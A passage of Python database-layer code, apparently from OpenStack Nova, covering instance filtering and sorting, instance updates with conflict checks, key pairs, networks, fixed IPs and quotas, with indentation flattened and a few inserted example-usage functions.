filter_by(deleted=0)
if not filters.pop('soft_deleted', False):
# It would be better to have vm_state not be nullable
# but until then we test it explicitly as a workaround.
not_soft_deleted = or_(
models.Instance.vm_state != vm_states.SOFT_DELETED,
models.Instance.vm_state == null()
)
query_prefix = query_prefix.filter(not_soft_deleted)
if 'cleaned' in filters:
if filters.pop('cleaned'):
query_prefix = query_prefix.filter(models.Instance.cleaned == 1)
else:
query_prefix = query_prefix.filter(models.Instance.cleaned == 0)
if 'tags' in filters:
tags = filters.pop('tags')
# We build a JOIN ladder expression for each tag, JOIN'ing
# the first tag to the instances table, and each subsequent
# tag to the last JOIN'd tags table
first_tag = tags.pop(0)
query_prefix = query_prefix.join(models.Instance.tags)
query_prefix = query_prefix.filter(models.Tag.tag == first_tag)
for tag in tags:
tag_alias = aliased(models.Tag)
query_prefix = query_prefix.join(tag_alias,
models.Instance.tags)
query_prefix = query_prefix.filter(tag_alias.tag == tag)
if 'tags-any' in filters:
tags = filters.pop('tags-any')
tag_alias = aliased(models.Tag)
query_prefix = query_prefix.join(tag_alias, models.Instance.tags)
query_prefix = query_prefix.filter(tag_alias.tag.in_(tags))
if not context.is_admin:
# If we're not admin context, add appropriate filter.
if context.project_id:
filters['project_id'] = context.project_id
else:
filters['user_id'] = context.user_id
# Filters for exact matches that we can do along with the SQL query...
# For other filters that don't match this, we will do regexp matching
exact_match_filter_names = ['project_id', 'user_id', 'image_ref',
'vm_state', 'instance_type_id', 'uuid',
'metadata', 'host', 'task_state',
'system_metadata']
# Filter the query
query_prefix = _exact_instance_filter(query_prefix,
filters, exact_match_filter_names)
if query_prefix is None:
return []
query_prefix = _regex_instance_filter(query_prefix, filters)
query_prefix = _tag_instance_filter(context, query_prefix, filters)
# paginate query
if marker is not None:
try:
marker = _instance_get_by_uuid(
context.elevated(read_deleted='yes'), marker)
except exception.InstanceNotFound:
raise exception.MarkerNotFound(marker)
try:
query_prefix = sqlalchemyutils.paginate_query(query_prefix,
models.Instance, limit,
sort_keys,
marker=marker,
sort_dirs=sort_dirs)
except db_exc.InvalidSortKey:
raise exception.InvalidSortKey()
return _instances_fill_metadata(context, query_prefix.all(), manual_joins)
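# Illustrative sketch (editorial addition, not part of the original module):
# one way the exact-match / regex split documented above plays out.  The
# filter values and the helper name are made up for the example.
def _example_list_web_instances(context):
    filters = {
        'deleted': False,                                    # handled explicitly
        'vm_state': [vm_states.ACTIVE, vm_states.STOPPED],   # exact, IN clause
        'display_name': 'web',                               # regex/LIKE match
    }
    return instance_get_all_by_filters_sort(
        context, filters, limit=50,
        sort_keys=['created_at'], sort_dirs=['desc'])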
def _tag_instance_filter(context, query, filters):
"""Applies tag filtering to an Instance query.
Returns the updated query. This method alters filters to remove
keys that are tags. This filters on resources by tags - this
method assumes that the caller will take care of access control
:param context: request context object
:param query: query to apply filters to
:param filters: dictionary of filters
"""
if filters.get('filter') is None:
return query
model = models.Instance
model_metadata = models.InstanceMetadata
model_uuid = model_metadata.instance_uuid
or_query = None
def _to_list(val):
if isinstance(val, dict):
val = val.values()
if not isinstance(val, (tuple, list, set)):
val = (val,)
return val
for filter_block in filters['filter']:
if not isinstance(filter_block, dict):
continue
filter_name = filter_block.get('name')
if filter_name is None:
continue
tag_name = filter_name[4:]
tag_val = _to_list(filter_block.get('value'))
if filter_name.startswith('tag-'):
if tag_name not in ['key', 'value']:
msg = _("Invalid field name: %s") % tag_name
raise exception.InvalidParameterValue(err=msg)
subq = getattr(model_metadata, tag_name).in_(tag_val)
or_query = subq if or_query is None else or_(or_query, subq)
elif filter_name.startswith('tag:'):
subq = model_query(context, model_metadata, (model_uuid,)).\
filter_by(key=tag_name).\
filter(model_metadata.value.in_(tag_val))
query = query.filter(model.uuid.in_(subq))
if or_query is not None:
subq = model_query(context, model_metadata, (model_uuid,)).\
filter(or_query)
query = query.filter(model.uuid.in_(subq))
return query
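# Illustrative sketch (editorial addition, not part of the original module):
# the shape of the special 'filter' key consumed by _tag_instance_filter.
# The metadata key and values are made up.
def _example_metadata_tag_filters():
    return {
        'filter': [
            {'name': 'tag-key', 'value': 'purpose'},       # OR'd key match
            {'name': 'tag:environment', 'value': 'prod'},  # exact key/value
        ]
    }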
def _get_regexp_op_for_connection(db_connection):
db_string = db_connection.split(':')[0].split('+')[0]
regexp_op_map = {
'postgresql': '~',
'mysql': 'REGEXP',
'sqlite': 'REGEXP'
}
return regexp_op_map.get(db_string, 'LIKE')
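# Illustrative sketch (editorial addition, not part of the original module):
# the operator is picked from the scheme of the connection URL alone; the
# URLs below are made up.
def _example_regexp_op():
    assert _get_regexp_op_for_connection(
        'mysql+pymysql://nova:pw@db/nova') == 'REGEXP'
    assert _get_regexp_op_for_connection(
        'postgresql://nova:pw@db/nova') == '~'
    # Unknown backends fall back to LIKE, which _regex_instance_filter then
    # wraps in '%...%'.
    assert _get_regexp_op_for_connection('mssql://db/nova') == 'LIKE'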
def _regex_instance_filter(query, filters):
"""Applies regular expression filtering to an Instance query.
Returns the updated query.
:param query: query to apply filters to
:param filters: dictionary of filters with regex values
"""
model = models.Instance
db_regexp_op = _get_regexp_op_for_connection(CONF.database.connection)
for filter_name in filters:
try:
column_attr = getattr(model, filter_name)
except AttributeError:
continue
if 'property' == type(column_attr).__name__:
continue
filter_val = filters[filter_name]
# Sometimes the REGEX filter value is not a string
if not isinstance(filter_val, six.string_types):
filter_val = str(filter_val)
if db_regexp_op == 'LIKE':
query = query.filter(column_attr.op(db_regexp_op)(
u'%' + filter_val + u'%'))
else:
query = query.filter(column_attr.op(db_regexp_op)(
filter_val))
return query
def _exact_instance_filter(query, filters, legal_keys):
"""Applies exact match filtering to an Instance query.
Returns the updated query. Modifies filters argument to remove
filters consumed.
:param query: query to apply filters to
:param filters: dictionary of filters; values that are lists,
tuples, sets, or frozensets cause an 'IN' test to
be performed, while exact matching ('==' operator)
is used for other values
:param legal_keys: list of keys to apply exact filtering to
"""
filter_dict = {}
model = models.Instance
# Walk through all the keys
for key in legal_keys:
# Skip ones we're not filtering on
if key not in filters:
continue
# OK, filtering on this key; what value do we search for?
value = filters.pop(key)
if key in ('metadata', 'system_metadata'):
column_attr = getattr(model, key)
if isinstance(value, list):
for item in value:
for k, v in item.items():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
else:
for k, v in value.items():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
elif isinstance(value, (list, tuple, set, frozenset)):
if not value:
return None # empty IN-predicate; short circuit
# Looking for values in a list; apply to query directly
column_attr = getattr(model, key)
query = query.filter(column_attr.in_(value))
else:
# OK, simple exact match; save for later
filter_dict[key] = value
# Apply simple exact matches
if filter_dict:
query = query.filter(*[getattr(models.Instance, k) == v
for k, v in filter_dict.items()])
return query
def process_sort_params(sort_keys, sort_dirs,
default_keys=['created_at', 'id'],
default_dir='asc'):
"""Process the sort parameters to include default keys.
Creates a list of sort keys and a list of sort directions. Adds the default
keys to the end of the list if they are not already included.
When adding the default keys to the sort keys list, the associated
direction is:
1) The first element in the 'sort_dirs' list (if specified), else
2) 'default_dir' value (Note that 'asc' is the default value since this is
the default in sqlalchemy.utils.paginate_query)
:param sort_keys: List of sort keys to include in the processed list
:param sort_dirs: List of sort directions to include in the processed list
:param default_keys: List of sort keys that need to be included in the
processed list, they are added at the end of the list
if not already specified.
:param default_dir: Sort direction associated with each of the default
keys that are not supplied, used when they are added
to the processed list
:returns: list of sort keys, list of sort directions
:raise exception.InvalidInput: If more sort directions than sort keys
are specified or if an invalid sort
direction is specified
"""
# Determine direction to use for when adding default keys
if sort_dirs and len(sort_dirs) != 0:
default_dir_value = sort_dirs[0]
else:
default_dir_value = default_dir
# Create list of keys (do not modify the input list)
if sort_keys:
result_keys = list(sort_keys)
else:
result_keys = []
# If a list of directions is not provided, use the default sort direction
# for all provided keys
if sort_dirs:
result_dirs = []
# Verify sort direction
for sort_dir in sort_dirs:
if sort_dir not in ('asc', 'desc'):
msg = _("Unknown sort direction, must be 'desc' or 'asc'")
raise exception.InvalidInput(reason=msg)
result_dirs.append(sort_dir)
else:
result_dirs = [default_dir_value for _sort_key in result_keys]
# Ensure that the key and direction length match
while len(result_dirs) < len(result_keys):
result_dirs.append(default_dir_value)
# Unless more directions are specified, which is an error
if len(result_dirs) > len(result_keys):
msg = _("Sort direction size exceeds sort key size")
raise exception.InvalidInput(reason=msg)
# Ensure defaults are included
for key in default_keys:
if key not in result_keys:
result_keys.append(key)
result_dirs.append(default_dir_value)
return result_keys, result_dirs
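# Illustrative sketch (editorial addition, not part of the original module):
# the default keys are appended using the first supplied direction.
def _example_process_sort_params():
    keys, dirs = process_sort_params(['display_name'], ['desc'])
    # keys == ['display_name', 'created_at', 'id']
    # dirs == ['desc', 'desc', 'desc']
    return keys, dirs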
@require_context
@pick_context_manager_reader_allow_async
def instance_get_active_by_window_joined(context, begin, end=None,
project_id=None, host=None,
columns_to_join=None):
"""Return instances and joins that were active during window."""
query = context.session.query(models.Instance)
if columns_to_join is None:
columns_to_join_new = ['info_cache', 'security_groups']
manual_joins = ['metadata', 'system_metadata']
else:
manual_joins, columns_to_join_new = (
_manual_join_columns(columns_to_join))
for column in columns_to_join_new:
if 'extra.' in column:
query = query.options(undefer(column))
else:
query = query.options(joinedload(column))
query = query.filter(or_(models.Instance.terminated_at == null(),
models.Instance.terminated_at > begin))
if end:
query = query.filter(models.Instance.launched_at < end)
if project_id:
query = query.filter_by(project_id=project_id)
if host:
query = query.filter_by(host=host)
return _instances_fill_metadata(context, query.all(), manual_joins)
def _instance_get_all_query(context, project_only=False, joins=None):
if joins is None:
joins = ['info_cache', 'security_groups']
query = model_query(context,
models.Instance,
project_only=project_only)
for column in joins:
if 'extra.' in column:
query = query.options(undefer(column))
else:
query = query.options(joinedload(column))
return query
@pick_context_manager_reader_allow_async
def instance_get_all_by_host(context, host, columns_to_join=None):
return _instances_fill_metadata(context,
_instance_get_all_query(context).filter_by(host=host).all(),
manual_joins=columns_to_join)
def _instance_get_all_uuids_by_host(context, host):
"""Return a list of the instance uuids on a given host.
Returns a list of UUIDs, not Instance model objects.
"""
uuids = []
for tuple in model_query(context, models.Instance, (models.Instance.uuid,),
read_deleted="no").\
filter_by(host=host).\
all():
uuids.append(tuple[0])
return uuids
@pick_context_manager_reader
def instance_get_all_by_host_and_node(context, host, node,
columns_to_join=None):
if columns_to_join is None:
manual_joins = []
else:
candidates = ['system_metadata', 'metadata']
manual_joins = [x for x in columns_to_join if x in candidates]
columns_to_join = list(set(columns_to_join) - set(candidates))
return _instances_fill_metadata(context,
_instance_get_all_query(
context,
joins=columns_to_join).filter_by(host=host).
filter_by(node=node).all(), manual_joins=manual_joins)
@pick_context_manager_reader
def instance_get_all_by_host_and_not_type(context, host, type_id=None):
return _instances_fill_metadata(context,
_instance_get_all_query(context).filter_by(host=host).
filter(models.Instance.instance_type_id != type_id).all())
@pick_context_manager_reader
def instance_get_all_by_grantee_security_groups(context, group_ids):
if not group_ids:
return []
return _instances_fill_metadata(context,
_instance_get_all_query(context).
join(models.Instance.security_groups).
filter(models.SecurityGroup.rules.any(
models.SecurityGroupIngressRule.group_id.in_(group_ids))).
all())
@require_context
@main_context_manager.reader
def instance_floating_address_get_all(context, instance_uuid):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
floating_ips = model_query(context,
models.FloatingIp,
(models.FloatingIp.address,)).\
join(models.FloatingIp.fixed_ip).\
filter_by(instance_uuid=instance_uuid)
return [floating_ip.address for floating_ip in floating_ips]
# NOTE(hanlind): This method can be removed as conductor RPC API moves to v2.0.
@pick_context_manager_reader
def instance_get_all_hung_in_rebooting(context, reboot_window):
reboot_window = (timeutils.utcnow() -
datetime.timedelta(seconds=reboot_window))
# NOTE(danms): this is only used in the _poll_rebooting_instances()
# call in compute/manager, so we can avoid the metadata lookups
# explicitly
return _instances_fill_metadata(context,
model_query(context, models.Instance).
filter(models.Instance.updated_at <= reboot_window).
filter_by(task_state=task_states.REBOOTING).all(),
manual_joins=[])
def _retry_instance_update():
"""Wrap with oslo_db_api.wrap_db_retry, and also retry on
UnknownInstanceUpdateConflict.
"""
exception_checker = \
lambda exc: isinstance(exc, (exception.UnknownInstanceUpdateConflict,))
return oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
exception_checker=exception_checker)
@require_context
@_retry_instance_update()
@pick_context_manager_writer
def instance_update(context, instance_uuid, values, expected=None):
return _instance_update(context, instance_uuid, values, expected)
@require_context
@_retry_instance_update()
@pick_context_manager_writer
def instance_update_and_get_original(context, instance_uuid, values,
columns_to_join=None, expected=None):
"""Set the given properties on an instance and update it. Return
a shallow copy of the original instance reference, as well as the
updated one.
:param context: = request context object
:param instance_uuid: = instance uuid
:param values: = dict containing column values
If "expected_task_state" exists in values, the update can only happen
when the task state before update matches expected_task_state. Otherwise
an UnexpectedTaskStateError is raised.
:returns: a tuple of the form (old_instance_ref, new_instance_ref)
Raises NotFound if instance does not exist.
"""
instance_ref = _instance_get_by_uuid(context, instance_uuid,
columns_to_join=columns_to_join)
return (copy.copy(instance_ref), _instance_update(
context, instance_uuid, values, expected, original=instance_ref))
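# Illustrative sketch (editorial addition, not part of the original module):
# the expected_task_state handling described above gives compare-and-swap
# semantics.  The update below only succeeds while task_state is still None;
# otherwise UnexpectedTaskStateError is raised and the caller can retry.
def _example_guarded_task_state_update(context, instance_uuid):
    return instance_update(context, instance_uuid,
                           {'task_state': task_states.REBOOTING,
                            'expected_task_state': [None]})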
# NOTE(danms): This updates the instance's metadata list in-place and in
# the database to avoid stale data and refresh issues. It assumes the
# delete=True behavior of instance_metadata_update(...)
def _instance_metadata_update_in_place(context, instance, metadata_type, model,
metadata):
metadata = dict(metadata)
to_delete = []
for keyvalue in instance[metadata_type]:
key = keyvalue['key']
if key in metadata:
keyvalue['value'] = metadata.pop(key)
elif key not in metadata:
to_delete.append(keyvalue)
# NOTE: we have to hard_delete here otherwise we will get more than one
# system_metadata record when we read deleted for an instance;
# regular metadata doesn't have the same problem because we don't
# allow reading deleted regular metadata anywhere.
if metadata_type == 'system_metadata':
for condemned in to_delete:
context.session.delete(condemned)
instance[metadata_type].remove(condemned)
else:
for condemned in to_delete:
condemned.soft_delete(context.session)
for key, value in metadata.items():
newitem = model()
newitem.update({'key': key, 'value': value,
'instance_uuid': instance['uuid']})
context.session.add(newitem)
instance[metadata_type].append(newitem)
def _instance_update(context, instance_uuid, values, expected, original=None):
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(instance_uuid)
if expected is None:
expected = {}
else:
# Coerce all single values to singleton lists
expected = {k: [None] if v is None else sqlalchemyutils.to_list(v)
for (k, v) in six.iteritems(expected)}
# Extract 'expected_' values from values dict, as these aren't actually
# updates
for field in ('task_state', 'vm_state'):
expected_field = 'expected_%s' % field
if expected_field in values:
value = values.pop(expected_field, None)
# Coerce all single values to singleton lists
if value is None:
expected[field] = [None]
else:
expected[field] = sqlalchemyutils.to_list(value)
# Values which need to be updated separately
metadata = values.pop('metadata', None)
system_metadata = values.pop('system_metadata', None)
_handle_objects_related_type_conversions(values)
# Hostname is potentially unique, but this is enforced in code rather
# than the DB. The query below races, but the number of users of
# osapi_compute_unique_server_name_scope is small, and a robust fix
# will be complex. This is intentionally left as is for the moment.
if 'hostname' in values:
_validate_unique_server_name(context, values['hostname'])
compare = models.Instance(uuid=instance_uuid, **expected)
try:
instance_ref = model_query(context, models.Instance,
project_only=True).\
update_on_match(compare, 'uuid', values)
except update_match.NoRowsMatched:
# Update failed. Try to find why and raise a specific error.
# We should get here only because our expected values were not current
# when update_on_match executed. Having failed, we now have a hint that
# the values are out of date and should check them.
# This code is made more complex because we are using repeatable reads.
# If we have previously read the original instance in the current
# transaction, reading it again will return the same data, even though
# the above update failed because it has changed: it is not possible to
# determine what has changed in this transaction. In this case we raise
# UnknownInstanceUpdateConflict, which will cause the operation to be
# retried in a new transaction.
# Because of the above, if we have previously read the instance in the
# current transaction it will have been passed as 'original', and there
# is no point refreshing it. If we have not previously read the
# instance, we can fetch it here and we will get fresh data.
if original is None:
original = _instance_get_by_uuid(context, instance_uuid)
conflicts_expected = {}
conflicts_actual = {}
for (field, expected_values) in six.iteritems(expected):
actual = original[field]
if actual not in expected_values:
conflicts_expected[field] = expected_values
conflicts_actual[field] = actual
# Exception properties
exc_props = {
'instance_uuid': instance_uuid,
'expected': conflicts_expected,
'actual': conflicts_actual
}
# There was a conflict, but something (probably the MySQL read view,
# but possibly an exceptionally unlikely second race) is preventing us
# from seeing what it is. When we go round again we'll get a fresh
# transaction and a fresh read view.
if len(conflicts_actual) == 0:
raise exception.UnknownInstanceUpdateConflict(**exc_props)
# Task state gets special handling for convenience. We raise the
# specific error UnexpectedDeletingTaskStateError or
# UnexpectedTaskStateError as appropriate
if 'task_state' in conflicts_actual:
conflict_task_state = conflicts_actual['task_state']
if conflict_task_state == task_states.DELETING:
exc = exception.UnexpectedDeletingTaskStateError
else:
exc = exception.UnexpectedTaskStateError
# Everything else is an InstanceUpdateConflict
else:
exc = exception.InstanceUpdateConflict
raise exc(**exc_props)
if metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'metadata',
models.InstanceMetadata,
metadata)
if system_metadata is not None:
_instance_metadata_update_in_place(context, instance_ref,
'system_metadata',
models.InstanceSystemMetadata,
system_metadata)
return instance_ref
@pick_context_manager_writer
def instance_add_security_group(context, instance_uuid, security_group_id):
"""Associate the given security group with the given instance."""
sec_group_ref = models.SecurityGroupInstanceAssociation()
sec_group_ref.update({'instance_uuid': instance_uuid,
'security_group_id': security_group_id})
sec_group_ref.save(context.session)
@require_context
@pick_context_manager_writer
def instance_remove_security_group(context, instance_uuid, security_group_id):
"""Disassociate the given security group from the given instance."""
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(instance_uuid=instance_uuid).\
filter_by(security_group_id=security_group_id).\
soft_delete()
###################
@require_context
@pick_context_manager_reader
def instance_info_cache_get(context, instance_uuid):
"""Gets an instance info cache from the table.
:param instance_uuid: = uuid of the info cache's instance
"""
return model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
first()
@require_context
@pick_context_manager_writer
def instance_info_cache_update(context, instance_uuid, values):
"""Update an instance info cache record in the table.
:param instance_uuid: = uuid of info cache's instance
:param values: = dict containing column values to update
"""
convert_objects_related_datetimes(values)
info_cache = model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
first()
needs_create = False
if info_cache and info_cache['deleted']:
raise exception.InstanceInfoCacheNotFound(
instance_uuid=instance_uuid)
elif not info_cache:
# NOTE(tr3buchet): just in case someone blows away an instance's
# cache entry, re-create it.
values['instance_uuid'] = instance_uuid
info_cache = models.InstanceInfoCache(**values)
needs_create = True
try:
with main_context_manager.writer.savepoint.using(context):
if needs_create:
info_cache.save(context.session)
else:
info_cache.update(values)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to
# recreate the instance cache entry at the same time. First one
# wins.
pass
return info_cache
@require_context
@pick_context_manager_writer
def instance_info_cache_delete(context, instance_uuid):
"""Deletes an existing instance_info_cache record
:param instance_uuid: = uuid of the instance tied to the cache record
"""
model_query(context, models.InstanceInfoCache).\
filter_by(instance_uuid=instance_uuid).\
soft_delete()
###################
def _instance_extra_create(context, values):
inst_extra_ref = models.InstanceExtra()
inst_extra_ref.update(values)
inst_extra_ref.save(context.session)
return inst_extra_ref
@pick_context_manager_writer
def instance_extra_update_by_uuid(context, instance_uuid, values):
rows_updated = model_query(context, models.InstanceExtra).\
filter_by(instance_uuid=instance_uuid).\
update(values)
if not rows_updated:
LOG.debug("Created instance_extra for %s", instance_uuid)
create_values = copy.copy(values)
create_values["instance_uuid"] = instance_uuid
_instance_extra_create(context, create_values)
rows_updated = 1
return rows_updated
@pick_context_manager_reader
def instance_extra_get_by_instance_uuid(context, instance_uuid,
columns=None):
query = model_query(context, models.InstanceExtra).\
filter_by(instance_uuid=instance_uuid)
if columns is None:
columns = ['numa_topology', 'pci_requests', 'flavor', 'vcpu_model',
'migration_context']
for column in columns:
query = query.options(undefer(column))
instance_extra = query.first()
return instance_extra
###################
@require_context
@main_context_manager.writer
def key_pair_create(context, values):
try:
key_pair_ref = models.KeyPair()
key_pair_ref.update(values)
key_pair_ref.save(context.session)
return key_pair_ref
except db_exc.DBDuplicateEntry:
raise exception.KeyPairExists(key_name=values['name'])
@require_context
@main_context_manager.writer
def key_pair_destroy(context, user_id, name):
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
soft_delete()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
@require_context
@main_context_manager.reader
def key_pair_get(context, user_id, name):
result = model_query(context, models.KeyPair).\
filter_by(user_id=user_id).\
filter_by(name=name).\
first()
if not result:
raise exception.KeypairNotFound(user_id=user_id, name=name)
return result
@require_context
@main_context_manager.reader
def key_pair_get_all_by_user(context, user_id):
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
all()
@require_context
@main_context_manager.reader
def key_pair_count_by_user(context, user_id):
return model_query(context, models.KeyPair, read_deleted="no").\
filter_by(user_id=user_id).\
count()
###################
@main_context_manager.writer
def network_associate(context, project_id, network_id=None, force=False):
"""Associate a project with a network.
called by project_get_networks under certain conditions
and network manager add_network_to_project()
only associate if the project doesn't already have a network
or if force is True
force solves race condition where a fresh project has multiple instance
builds simultaneously picked up by multiple network hosts which attempt
to associate the project with multiple networks
force should only be used as a direct consequence of user request
all automated requests should not use force
"""
def network_query(project_filter, id=None):
filter_kwargs = {'project_id': project_filter}
if id is not None:
filter_kwargs['id'] = id
return model_query(context, models.Network, read_deleted="no").\
filter_by(**filter_kwargs).\
with_lockmode('update').\
first()
if not force:
# find out if project has a network
network_ref = network_query(project_id)
if force or not network_ref:
# in force mode or project doesn't have a network so associate
# with a new network
# get new network
network_ref = network_query(None, network_id)
if not network_ref:
raise exception.NoMoreNetworks()
# associate with network
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
network_ref['project_id'] = project_id
context.session.add(network_ref)
return network_ref
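# Illustrative sketch (editorial addition, not part of the original module):
# the usual, non-forced call.  If the project already has a network this is
# effectively a no-op; force=True is reserved for explicit user requests.
def _example_associate_project_network(context):
    return network_associate(context, context.project_id, network_id=None)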
def _network_ips_query(context, network_id):
return model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id)
@main_context_manager.reader
def network_count_reserved_ips(context, network_id):
return _network_ips_query(context, network_id).\
filter_by(reserved=True).\
count()
@main_context_manager.writer
def network_create_safe(context, values):
network_ref = models.Network()
network_ref['uuid'] = str(uuid.uuid4())
network_ref.update(values)
try:
network_ref.save(context.session)
return network_ref
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
@main_context_manager.writer
def network_delete_safe(context, network_id):
result = model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
filter_by(allocated=True).\
count()
if result != 0:
raise exception.NetworkInUse(network_id=network_id)
network_ref = _network_get(context, network_id=network_id)
model_query(context, models.FixedIp, read_deleted="no").\
filter_by(network_id=network_id).\
soft_delete()
context.session.delete(network_ref)
@main_context_manager.writer
def network_disassociate(context, network_id, disassociate_host,
disassociate_project):
net_update = {}
if disassociate_project:
net_update['project_id'] = None
if disassociate_host:
net_update['host'] = None
network_update(context, network_id, net_update)
def _network_get(context, network_id, project_only='allow_none'):
result = model_query(context, models.Network, project_only=project_only).\
filter_by(id=network_id).\
first()
if not result:
raise exception.NetworkNotFound(network_id=network_id)
return result
@require_context
@main_context_manager.reader
def network_get(context, network_id, project_only='allow_none'):
return _network_get(context, network_id, project_only=project_only)
@require_context
@main_context_manager.reader
def network_get_all(context, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).all()
if not result:
raise exception.NoNetworksFound()
return result
@require_context
@main_context_manager.reader
def network_get_all_by_uuids(context, network_uuids, project_only):
result = model_query(context, models.Network, read_deleted="no",
project_only=project_only).\
filter(models.Network.uuid.in_(network_uuids)).\
all()
if not result:
raise exception.NoNetworksFound()
# check if the result contains all the networks
# we are looking for
for network_uuid in network_uuids:
for network in result:
if network['uuid'] == network_uuid:
break
else:
if project_only:
raise exception.NetworkNotFoundForProject(
network_uuid=network_uuid, project_id=context.project_id)
raise exception.NetworkNotFound(network_id=network_uuid)
return result
def _get_associated_fixed_ips_query(context, network_id, host=None):
# NOTE(vish): The ugly joins here are to solve a performance issue and
# should be removed once we can add and remove leases
# without regenerating the whole list
vif_and = and_(models.VirtualInterface.id ==
models.FixedIp.virtual_interface_id,
models.VirtualInterface.deleted == 0)
inst_and = and_(models.Instance.uuid == models.FixedIp.instance_uuid,
models.Instance.deleted == 0)
# NOTE(vish): This subquery left joins the minimum interface id for each
# instance. If the join succeeds (i.e. the 11th column is not
# null), then the fixed ip is on the first interface.
subq = context.session.query(
func.min(models.VirtualInterface.id).label("id"),
models.VirtualInterface.instance_uuid).\
group_by(models.VirtualInterface.instance_uuid).subquery()
subq_and = and_(subq.c.id == models.FixedIp.virtual_interface_id,
subq.c.instance_uuid == models.VirtualInterface.instance_uuid)
query = context.session.query(
models.FixedIp.address,
models.FixedIp.instance_uuid,
models.FixedIp.network_id,
models.FixedIp.virtual_interface_id,
models.VirtualInterface.address,
models.Instance.hostname,
models.Instance.updated_at,
models.Instance.created_at,
models.FixedIp.allocated,
models.FixedIp.leased,
subq.c.id).\
filter(models.FixedIp.deleted == 0).\
filter(models.FixedIp.network_id == network_id).\
join((models.VirtualInterface, vif_and)).\
join((models.Instance, inst_and)).\
outerjoin((subq, subq_and)).\
filter(models.FixedIp.instance_uuid != null()).\
filter(models.FixedIp.virtual_interface_id != null())
if host:
query = query.filter(models.Instance.host == host)
return query
@main_context_manager.reader
def network_get_associated_fixed_ips(context, network_id, host=None):
# FIXME(sirp): since this returns fixed_ips, this would be better named
# fixed_ip_get_all_by_network.
query = _get_associated_fixed_ips_query(context, network_id, host)
result = query.all()
data = []
for datum in result:
cleaned = {}
cleaned['address'] = datum[0]
cleaned['instance_uuid'] = datum[1]
cleaned['network_id'] = datum[2]
cleaned['vif_id'] = datum[3]
cleaned['vif_address'] = datum[4]
cleaned['instance_hostname'] = datum[5]
cleaned['instance_updated'] = datum[6]
cleaned['instance_created'] = datum[7]
cleaned['allocated'] = datum[8]
cleaned['leased'] = datum[9]
# NOTE(vish): default_route is True if this fixed ip is on the first
# interface of its instance.
cleaned['default_route'] = datum[10] is not None
data.append(cleaned)
return data
@main_context_manager.reader
def network_in_use_on_host(context, network_id, host):
query = _get_associated_fixed_ips_query(context, network_id, host)
return query.count() > 0
def _network_get_query(context):
return model_query(context, models.Network, read_deleted="no")
@main_context_manager.reader
def network_get_by_uuid(context, uuid):
result = _network_get_query(context).filter_by(uuid=uuid).first()
if not result:
raise exception.NetworkNotFoundForUUID(uuid=uuid)
return result
@main_context_manager.reader
def network_get_by_cidr(context, cidr):
result = _network_get_query(context).\
filter(or_(models.Network.cidr == cidr,
models.Network.cidr_v6 == cidr)).\
first()
if not result:
raise exception.NetworkNotFoundForCidr(cidr=cidr)
return result
@main_context_manager.reader
def network_get_all_by_host(context, host):
fixed_host_filter = or_(models.FixedIp.host == host,
and_(models.FixedIp.instance_uuid != null(),
models.Instance.host == host))
fixed_ip_query = model_query(context, models.FixedIp,
(models.FixedIp.network_id,)).\
outerjoin((models.Instance,
models.Instance.uuid ==
models.FixedIp.instance_uuid)).\
filter(fixed_host_filter)
# NOTE(vish): return networks that have host set
# or that have a fixed ip with host set
# or that have an instance with host set
host_filter = or_(models.Network.host == host,
models.Network.id.in_(fixed_ip_query.subquery()))
return _network_get_query(context).filter(host_filter).all()
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True,
retry_on_request=True)
@main_context_manager.writer
def network_set_host(context, network_id, host_id):
network_ref = _network_get_query(context).\
filter_by(id=network_id).\
first()
if not network_ref:
raise exception.NetworkNotFound(network_id=network_id)
if network_ref.host:
return None
rows_updated = _network_get_query(context).\
filter_by(id=network_id).\
filter_by(host=None).\
update({'host': host_id})
if not rows_updated:
LOG.debug('The row was updated in a concurrent transaction, '
'we will fetch another row')
raise db_exc.RetryRequest(
exception.NetworkSetHostFailed(network_id=network_id))
@require_context
@main_context_manager.writer
def network_update(context, network_id, values):
network_ref = _network_get(context, network_id)
network_ref.update(values)
try:
network_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.DuplicateVlan(vlan=values['vlan'])
return network_ref
###################
@require_context
@main_context_manager.reader
def quota_get(context, project_id, resource, user_id=None):
model = models.ProjectUserQuota if user_id else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
query = query.filter_by(user_id=user_id)
result = query.first()
if not result:
if user_id:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
return result
@require_context
@main_context_manager.reader
def quota_get_all_by_project_and_user(context, project_id, user_id):
user_quotas = model_query(context, models.ProjectUserQuota,
(models.ProjectUserQuota.resource,
models.ProjectUserQuota.hard_limit)).\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
all()
result = {'project_id': project_id, 'user_id': user_id}
for user_quota in user_quotas:
result[user_quota.resource] = user_quota.hard_limit
return result
@require_context
@main_context_manager.reader
def quota_get_all_by_project(context, project_id):
rows = model_query(context, models.Quota, read_deleted="no").\
filter_by(project_id=project_id).\
all()
result = {'project_id': project_id}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
@main_context_manager.reader
def quota_get_all(context, project_id):
